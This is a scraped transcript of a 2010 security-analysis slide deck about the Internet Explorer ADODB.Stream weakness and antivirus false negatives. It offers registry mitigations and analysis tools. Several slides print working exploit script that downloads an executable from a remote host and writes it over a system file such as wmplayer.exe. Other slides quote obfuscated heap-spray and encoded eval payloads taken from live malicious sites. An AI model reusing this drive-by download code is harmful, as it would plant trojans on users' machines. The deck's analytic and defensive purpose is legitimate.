Presentation is loading. Please wait.

Presentation is loading. Please wait.

Shasta Console Operations February 2010 Tony Caleb.

Published byAlexis Carter Modified over 9 years ago

Similar presentations

Presentation on theme: "Shasta Console Operations February 2010 Tony Caleb."— Presentation transcript:

1 Shasta Console Operations February 2010 Tony Caleb

2 Agenda Dynamic Analysis AV/IS FN Detection MSIE ADODB. Stream Object Installation Weakness

3 Introduction MSIE ADODB.Stream Object Installation Weakness is the BROWSER EXPLOIT, that allows the hackers to attack a system through browser, install it’s activex controls and takes over the victims system. This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. - SYMANTEC ADODB.stream provides a method for reading and writing files on a hard drive. This by-design functionality is sometimes used by web applications. However, when combined with known security vulnerabilities in Microsoft Internet Explorer, it could allow an internet web site to execute script from the Local Machine Zone (LMZ). This occurs because the ADODB.Stream object allows access to the hard drive when hosted within Internet Explorer. - MICROSOFT This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker- specified file to the victim file system. – SECURITY FOCUS

4 How does it occurs? Microsoft Internet Explorer is prone to a security weakness that may permit malicious HTML documents to create or overwrite files on a victim file system when interpreted from the Local Zone (or other Security Zones with relaxed security restrictions, such as the Intranet Zone).

5 What it does in infected machine? This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker- specified file to the victim file system. In this manner, an HTML document that is interpreted in the context of a Security Zone with relaxed security restrictions may install a malicious file on the victim file system. The stream object contains several methods for reading and writing binary files and text files. When this by-design functionality is combined with known security vulnerabilities in Microsoft Internet Explorer, an Internet Web site could execute script from the Local Machine zone. This behavior occurs because the ADODB.Stream object permits access to the hard disk when the ADODB.Stream object is hosted in Internet Explorer The error that displays on the page when the script is been executed ( It makes the user think that just a error has occurred so that the page is not loaded but the malicious content is been downloaded in his system without his knowledge) error.jsp is a jsp page that consists of one line, namely (Just to send a false header in IE)

6 Sample Code const adTypeBinary = 1 const adSaveCreateOverwrite = 2 const adModeReadWrite = 3 set xmlHTTP = CreateObject("Microsoft.XMLHTTP") xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE", false xmlHTTP.send contents = xmlHTTP.responseBody Set oStr = CreateObject("ADODB.Stream") oStr.Mode = adModeReadWrite oStr.Type = adTypeBinary oStr.Open oStr.Write(contents) oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite How a file is been downloaded into a victims system

7 Sample Code var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://attacker/trojan.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; How this exploit can be made in vmplayer

8 Modification of vmplayer.exe function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media") } window.open("error.jsp","_media"); setTimeout("doit()", 5000); Code for the modification of Windows Media Player

9 How to Overcome This Issue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566- 0000-0010-8000-00AA006D2EA4} Changing the keys in the Registry Disabling of ActiveX controls Disabling of any kind of ActiveX controls in the IE security. So that it does not allow anything to download by itself( Anyhow in the older versions of the Internet Explorer it is not possible).

10 Changing the keys in the Registry 1.Close any open Internet Explorer browser windows. 2.Click Start, and then click Run. 3.In the Open box, type Regedit, and then click OK. 4.In Registry Editor, locate the following registry key: 5.“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility” 6.Right-click ActiveX Compatibility, point to New, and then click Key. 7.Type the following name for the key: 8.{00000566-0000-0010-8000-00AA006D2EA4} 9.Close Registry Editor.

11 Samples of FN Detection MSIE Event Object Mem Corruption Code Exec HTTP MSIE Style Tag Cmt Mem Corruption The domain “khan.co.kr” with URL http://gallery.khan.co.kr/ is found to have the above threat but during the manual analysis of this URL NIS does not detect it. Here the hackers have bypassed the AV/IS.http://gallery.khan.co.kr/ This is a common FN that we find in with IS. Here a script that redirects to malicious links will be given in the encoded format and since the redirect link is not active NIS but it will change dynamically. This clearly proves that the malicious content is intentionally done since the script tag is present after the close html tag. Trojan.Malscript.B The domain Voy.com with the URL http://www.voy.com//76583 is found to have the above threat but during the manual analysis of this URL and the AV/IS fail to detect.http://www.voy.com//76583

12 MSIE Event Object Mem Corruption Code Exec

13

14 Code in the index2.html eval(function(p,a,c,k,e,d){e=function(c){return(c 35?String.fromCharCo de(c+29):c.toString (36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function() {return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g a=1b;g 2="%u";g 1B="%2E%w%2t%c%2w"+2+"b";g 10="%P%34%h%39"+2+"6";g 1l="%C%B%A%h%36";g 1C="%2Y%2Q%2P%2T%1P%1W";g s=a("%1O%1L"+2+"6%M%1H%1F% K%1E%1K"+2+"6%1a%1N%2m%2a%S%4b"+2+"b%4a");s+=a("%q%N%y%49"+2+"6%41%f%k%4w" +2+"6%4r%q%N%y%4s"+2+"6%3s%f%k");s+=a("% 3w"+2+"6%3V%q%N%y%1y"+2+"6%3E%f%k%3I"+2+"6%3H%1s%17%3G%M%16");s+=a("%19%1e %r%k%4c"+2+"6%R%1s%17%3J%M%16%19%3A%r%k% 3B"+2+"6%R");s+=a("%3C%3D"+2+"6%1a%3L%3S%3T%3U%3R%3Q%3M%3N%3O%3P%3z%3y% 3i%3j%3k"+"F"+"0"+"5");s+=a("%3l%3h%3g%3c%3d% 3e"+2+"6%3f%X%3m%1c%J%L%3n%15%3u");s+=a("%L%3v%1c%J%L%3t%15%3o%3p%W%P%3q %f%3r%14%1e%q");s+=a("%k%3X"+2+"6%Q%4t%4u%4v%4q% 4m%4n%4o%4p%X%4x%4E%4F%4G");s+=a("%4D%4C%W%12%1z%4y%4z%4A%4B%4l%4k%44 %1z%46%47%43%42");s+=a("%3Y%3Z"+2+"6%40%14%P"+10+"% 4g"+2+"6%4h%4i"+2+"6%4j");s+=a("%4f"+2+"b%m%4e"+2+"6%12%11%11%l%3b%4d%4H%2U%27 %28%29%u"+"4"+"1"+"9"+"0");s+=a("%26%25%21% 22%23%24%2b"+2+"b%c%2c"+2+"b%2j%2k%2l%1y%2i"+2+"b");s+=a("%18%1f%1r%2h"+2+"6%h%2 d"+2+"6%l%1q%1t%1u%1x%2e"+2+"6%1w%

15 MSIE Event Object Mem Corruption Code Exec Code in the index2.html 1v");s+=a("%S%2f"+2+"6%20"+2+"6%K%S%1V"+2+"b%1G%1J%1f%1r%1M"+2+"6%h%1I");s+=a(""+ 2+"6%l%1q%1t%1u%1x%1Z"+2+"6%1w%1v%1X%1Y% 1U%1T%R%1Q"+2+"b");s+=a("%1R%1S%2g%Q%3a%2o%2V%2W%2X"+2+"6%l%Q%2S%2O%U% 2R%2Z");s+=a("%37%38"+2+"6%35%30%31%32%33%2N%2M%r%K% 2x%y%2y"+2+"6%l");s+=a("%2z%2v%1d%w%J%2u%2q%2p%2r%2s"+2+"6%l%z%2A%2B%f"+2+"6") ;s+=a("%2I%2J"+2+"6%2K%2L%2H%1n%w%1k%2G%v% 1j%2C%r%1g%2D"+2+"b");s+=a("%1h"+2+"b%1i%d%2F%45%5k%76"+1l+""+2+"b%h%75"+2+"6");s+ =a("%4I%v%m%E"+2+"b%z%I%78%79%U%74%73%C% B%A%h%6Z");s+=a(""+2+"b%h%6Y"+2+"6%70%v%m%E"+2+"b%z%I%71%72%U%7b%7j%C");s+=a ("%B%A%h%7m"+2+"b%h%7i"+2+"6%7h%v%m%E"+2+"b%z% I%7g%6X");s+=a("%6W%1n%w%1k%6E%6D%1j%6F%f%1g%6G"+2+"b%1h"+2+"b%1i%6H%c");s+= a("%6C"+2+"6%6B%6x%6w%6y%f%e%d%c%6z"+2+"6%6A% 6I%6J%6S%f");s+=a("%e%d%c%6R"+2+"6%6T%6U%6V%6Q%f%e%d%c%6P"+2+"6%6L%6K");s+= a("%6M%7o%f%e%d%c%6N"+2+"6%6O%7n%7x%86%f%e%d%c% 7R");s+=a(""+2+"b%7Q%87%7W%7X%f%e%d%c%7Y"+2+"6%7Z%7V%7U%7P%f%e");s+=a("%d%c %7S"+2+"6%7T%80%81%88%f%e%d%c%82"+2+"b%83%84% 85");s+=a("%7N%f%e%d%c%7w"+2+"b%7O%7y%Z%7z%f%e%d%c%7v"+2+"6");s+=a("%7u%7q%7p %7r"+2+"6%e%d%c%7s"+2+"6%7t%7A%7B%7J"+2+"6%e%

16 HTTP MSIE Style Tag Cmt Mem Corruption The /* is closed after the end of style tag that is after 80,000 lines of garbage stuff. Due to insertion of these unwanted stuff, the memory stack is overflow and as a result the entire browser crashes. body{background-repeat:repeat;background- color:black;background-image:none;color:black;visibility:hidden;font-size:10000;line- height:10000;letter-spacing:10000;text-decoration:blink;text-align:right;margin- top:10000;}form{visibility:hidden;}table{visibility:hidden;}a{visibility:hidden;}img{visibility:hidden;}input{vi sibility:hidden;} @;/* URL : hxxp://www.voy.com//76583/

17 Manual Analysis How we do the manual analysis Tools we use for manual analysis Samples

18 Tools Used for Manual Analysis HTTP Analyzer TCP Viewer Process Explorer Systracer (System Tracer) Start up programs ( msconfig,services.msc)

19 HTTP Malicious Toolkit Variant Activity From URL: function bfbn15(p){ var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,1 4,41,59,1,51,47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,44,36,22,5,7,3 5,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12);for(i=Math.ceil(h/k);i>0;i-- ){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)- 48]) >=8;d- =2}else{d=6}}}eval(c);}}bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjA pCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG7 0@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPd UrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl') After Decoding function bfbn15(p) bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeI m_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI 32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIG Zki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl')

20 HTTP Malicious Toolkit Variant Activity

21

22 Thank You

Download ppt "Shasta Console Operations February 2010 Tony Caleb."

Similar presentations

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?

WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?
The Web Warrior Guide to Web Design Technologies

The Web Warrior Guide to Web Design Technologies
Configuring Windows Internet Explorer 7 Security Lesson 5.

Configuring Windows Internet Explorer 7 Security Lesson 5.
A Crawler-based Study of Spyware on the Web Author: Alexander Moshchuk, Tanya Bragin, Steven D.Gribble, Henry M.Levy Presented At: NDSS, 2006 Prepared.

A Crawler-based Study of Spyware on the Web Author: Alexander Moshchuk, Tanya Bragin, Steven D.Gribble, Henry M.Levy Presented At: NDSS, 2006 Prepared.
NetAcumen ActiveX Download Instructions

NetAcumen ActiveX Download Instructions
XP Information Technology Center - KFUPM1 Microsoft Office FrontPage 2003 Creating a Web Site.

XP Information Technology Center - KFUPM1 Microsoft Office FrontPage 2003 Creating a Web Site.
Project 1 Introduction to HTML.

Project 1 Introduction to HTML.
Configuring Windows Vista Security Chapter 3. IE7 Pop-up Blocker Pop-up Blocker prevents annoying and sometimes unsafe pop-ups from web sites Can block.

Configuring Windows Vista Security Chapter 3. IE7 Pop-up Blocker Pop-up Blocker prevents annoying and sometimes unsafe pop-ups from web sites Can block.
Server-Side vs. Client-Side Scripting Languages

Server-Side vs. Client-Side Scripting Languages
1 Chapter 12 Working With Access 2000 on the Internet.

1 Chapter 12 Working With Access 2000 on the Internet.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 11: Monitoring Server Performance.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 11: Monitoring Server Performance.
Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 3 Internet Security.

Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 3 Internet Security.
Tutorial 10 Programming with JavaScript

Tutorial 10 Programming with JavaScript
CM143 - Web Week 2 Basic HTML. Links and Image Tags.

CM143 - Web Week 2 Basic HTML. Links and Image Tags.
Malicious Attacks. Introduction Commonly referred to as: malicious software/ “malware”, computer viruses Designed to enter computers without the owner’s.

Malicious Attacks. Introduction Commonly referred to as: malicious software/ “malware”, computer viruses Designed to enter computers without the owner’s.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Chapter 4 Application Security Knowledge and Test Prep

Chapter 4 Application Security Knowledge and Test Prep
Define objects and their relationships to multimedia Explain the fundamentals of C, C++, Java, JavaScript, JScript, C#, ActiveX and VBScript Discuss security.

Define objects and their relationships to multimedia Explain the fundamentals of C, C++, Java, JavaScript, JScript, C#, ActiveX and VBScript Discuss security.
1st Project Introduction to HTML.

1st Project Introduction to HTML.

Similar presentations

Ads by Google